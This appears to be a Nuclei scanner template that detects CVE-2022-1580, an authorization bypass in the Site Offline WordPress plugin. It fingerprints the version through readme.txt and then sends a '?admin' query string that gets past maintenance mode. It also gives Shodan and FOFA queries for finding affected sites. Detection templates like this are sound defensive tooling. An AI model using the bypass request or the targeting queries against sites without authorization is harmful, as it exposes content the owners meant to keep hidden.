id: CVE-2022-1580

info:
  name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
  author: s4e-io
  severity: medium
  description: |
    The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
  impact: |
    Attackers can bypass the site offline/maintenance mode by adding specific keywords to the URL query string, gaining unauthorized access to the website.
  remediation: Fixed in 1.5.3
  reference:
    - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2022-1580
    cwe-id: CWE-639
    epss-score: 0.15122
    epss-percentile: 0.94774
    cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freehtmldesigns
    product: "site_offline"
    framework: wordpress
    publicwww-query: "/wp-content/plugins/site-offline/"
    shodan-query: http.html:/wp-content/plugins/site-offline/
    fofa-query: body=/wp-content/plugins/site-offline/
  tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - "Site Offline Or Coming Soon Or Maintenance Mode"

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?admin"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "wp-block", "author")'
          - "status_code == 200"
          - "compare_versions(version, '< 1.5.3')"
        condition: and
# digest: 490a0046304402205c7995838d1fec6ec691ad3a790a1c9612bfb69048e1e9ac4d99b0f5c53a3ae202205f2f955ebfaf54f9e68749a230562d21c2c4a8579ea205b5db105cddbe1ab058:922c64590222798bb761d5b6d8e72950